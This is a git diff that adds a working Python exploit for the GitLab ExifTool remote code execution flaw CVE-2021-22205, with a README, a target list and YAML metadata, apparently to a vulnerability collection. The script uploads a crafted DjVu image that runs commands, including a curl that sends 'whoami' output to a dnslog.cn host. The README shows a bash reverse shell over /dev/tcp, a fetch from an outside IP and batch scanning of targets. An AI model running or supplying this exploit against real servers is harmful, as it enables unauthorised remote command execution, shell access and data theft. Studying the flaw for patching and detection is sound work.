diff --git a/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py b/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py new file mode 100644 index 0000000000000000000000000000000000000000..442dbd08e094bd78a38e8464b7b43c40bf524fe5 --- /dev/null +++ b/cve/gitlab/2021/CVE-2021-22205/CVE-2021-22205.py @@ -0,0 +1,120 @@ +import requests +from bs4 import BeautifulSoup +import base64 +import random +import sys +import os +import argparse + +requests.packages.urllib3.disable_warnings() + +def title(): + print(""" + ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ + | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | + \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ + + Author:Al1ex@Heptagram + Github:https://github.com/Al1ex + """) + print(''' + 验证模式:python CVE-2021-22205.py -v true -t target_url + 攻击模式:python CVE-2021-22205.py -a true -t target_url -c command + 批量检测:python CVE-2021-22205.py -s true -f file + ''') + +def check(target_url): + session = requests.Session() + try: + req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) + soup = BeautifulSoup(req1.text, features="lxml") + token = soup.findAll('meta')[16].get("content") + data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", + "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} + flag = 'Failed to process image' + req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) + if flag in req2.text: + print("[+] 目标 {} 存在漏洞".format(target_url)) + else: + print("[-] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + print(e) + +def attack(target_url,command): + session = requests.Session() + try: + req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) + soup = BeautifulSoup(req1.text, features="lxml") + token = soup.findAll('meta')[16].get("content") + data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", + "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} + flag = 'Failed to process image' + req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) + if flag in req2.text: + print("[+] 目标 {} 存在漏洞".format(target_url)) + print("[+] 请到dnslog或主机检查执行结果") + else: + print("[-] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + print(e) + +def scan(file): + for url_link in open(file, 'r', encoding='utf-8'): + if url_link.strip() != '': + url_path = format_url(url_link.strip()) + check(url_path) + +def format_url(url): + try: + if url[:4] != "http": + url = "https://" + url + url = url.strip() + return url + except Exception as e: + print('URL 错误 {0}'.format(url)) + +def main(): + parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') + parser.add_argument('-v', '--verify', type=bool,help=' 验证模式 ') + parser.add_argument('-t', '--target', type=str, help=' 目标URL ') + + parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ') + parser.add_argument('-c', '--command', type=str, help=' 执行命令 ') + + parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') + parser.add_argument('-f', '--file', type=str, help=' 文件路径 ') + + + args = parser.parse_args() + + verify_model = args.verify + target_url = args.target + + attack_model = args.attack + command = args.command + + scan_model = args.scan + file = args.file + + if verify_model is True and target_url !=None: + check(target_url) + elif attack_model is True and target_url != None and command != None: + attack(target_url,command) + elif scan_model is True and file != None: + scan(file) + else: + sys.exit(0) + +if __name__ == '__main__': + title() + main() \ No newline at end of file diff --git a/cve/gitlab/2021/CVE-2021-22205/README.md b/cve/gitlab/2021/CVE-2021-22205/README.md new file mode 100644 index 0000000000000000000000000000000000000000..405ecc6d439287d6aeff99ab39b6b0b3ad1bec28 --- /dev/null +++ b/cve/gitlab/2021/CVE-2021-22205/README.md @@ -0,0 +1,97 @@ +### Vuln Impact + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + +### Vuln Product + +- Gitlab CE/EE < 13.10.3 +- Gitlab CE/EE < 13.9.6 +- Gitlab CE/EE < 13.8.8 + +### Environment + +```C +export GITLAB_HOME=/srv/gitlab + +sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ce:13.9.1-ce.0 +``` + +### Vunl Check + +##### Basic usage + +```c +python3 CVE-2021-2205.py +``` + +![img](img/usage.png) + +##### Vuln check + +```c +python3 CVE-2021-2205.py -v true -t http://gitlab.example.com +``` + +![img](img/check.png) + +##### command execute + +```c +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt" +``` + +![attack](img/attack.png) + +```c +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt" +``` + +![attack_command1](img/attack_command1.png) + +![attack_command2](img/attack_command2.png) + +##### batch scan + +``` +python3 CVE-2021-2205.py -s true -f target.txt +``` + +![scan_result](img/scan_result.png) + +##### Reserve Shell + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" +``` + +![reverse_shell1](img/reverse_shell1.png) + +![reverse_shell2](img/reverse_shell2.png) + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh" +``` + +![reverse_shell3](img/reverse_shell3.png) + +![reverse_shell4](img/reverse_shell4.png) + +``` +python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh" +``` + +![reverse_shell5](img/reverse_shell5.png) + +### Reference + +https://github.com/mr-r3bot/Gitlab-CVE-2021-22205 + +https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html \ No newline at end of file diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack.png b/cve/gitlab/2021/CVE-2021-22205/img/attack.png new file mode 100644 index 0000000000000000000000000000000000000000..390bcd6d6f95ec3a80a2c3b069e04eafea9d25b2 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png b/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png new file mode 100644 index 0000000000000000000000000000000000000000..b7184f1ca2bcfb0de24a15b8a9da660b0faa6d9d Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack_command1.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png b/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png new file mode 100644 index 0000000000000000000000000000000000000000..2161374c7177ed899a20d04ea60fbfcacab4817c Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/attack_command2.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/check.png b/cve/gitlab/2021/CVE-2021-22205/img/check.png new file mode 100644 index 0000000000000000000000000000000000000000..804c9119e22915f56bc351d69c36fdd14d94addc Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/check.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png new file mode 100644 index 0000000000000000000000000000000000000000..df8db9339f2689df58cfd1beb4a37c6ec50be24e Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell1.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png new file mode 100644 index 0000000000000000000000000000000000000000..6a13757146983f3395ae975ccd6ba9636d63d5ed Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell2.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png new file mode 100644 index 0000000000000000000000000000000000000000..4932414343a8e97776176cf3a0d1dc027af7a613 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell3.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png new file mode 100644 index 0000000000000000000000000000000000000000..f6a71c19f50b27786021caa70c963ac7c199799b Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell4.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png new file mode 100644 index 0000000000000000000000000000000000000000..9fa4c4fdcb22960f3cb32aca19b9575c24c12cd1 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/reverse_shell5.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png b/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png new file mode 100644 index 0000000000000000000000000000000000000000..116c404009f20ed6523c147647b48fd8e6f707e6 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/scan_result.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/img/usage.png b/cve/gitlab/2021/CVE-2021-22205/img/usage.png new file mode 100644 index 0000000000000000000000000000000000000000..9ac09486e21c7c10206fe8bb026031e09be46b00 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22205/img/usage.png differ diff --git a/cve/gitlab/2021/CVE-2021-22205/target.txt b/cve/gitlab/2021/CVE-2021-22205/target.txt new file mode 100644 index 0000000000000000000000000000000000000000..b2cc8425e6894695264601955099a38a52895e1d --- /dev/null +++ b/cve/gitlab/2021/CVE-2021-22205/target.txt @@ -0,0 +1 @@ +http://gitlab.example.com/ \ No newline at end of file diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml new file mode 100644 index 0000000000000000000000000000000000000000..e3d36c9d323bde72ea06faa144e69dcb2830f5e0 --- /dev/null +++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-22205 +source: https://github.com/Al1ex/CVE-2021-22205 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + 2021年4月14日Gitlab官方发布安全更新,披露了CVE-2021-22205 Gitlab exiftool 远程命令执行漏洞,攻击者通过上传恶意图片可触发远程命令执行,控制服务器。近期,互联网上披露CVE-2021-22205 Gitlab exiftool远程命令执行漏洞在野利用事件及其新型利用方式,由于Gitlab某些端点路径无需授权,攻击者可在无需认证的情况下完成图片上传,从而执行任意命令。 + scope-of-influence: + 11.9 <= GitLab(CE/EE)< 13.8.8 + 13.9 <= GitLab(CE/EE)< 13.9.6 + 13.10 <= GitLab(CE/EE)< 13.10.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2021-22205 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: RCE,cve2021,gitlab \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index deda6b28c6159d9632d63d54ccc297f7c284b878..479880b2101282bf8260a6e0651d5d6024c257aa 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -13,5 +13,7 @@ cve: - CVE-2022-2588 sudo: - CVE-2021-3156 + gitlab: + - CVE-2021-22205 cnvd: kve: \ No newline at end of file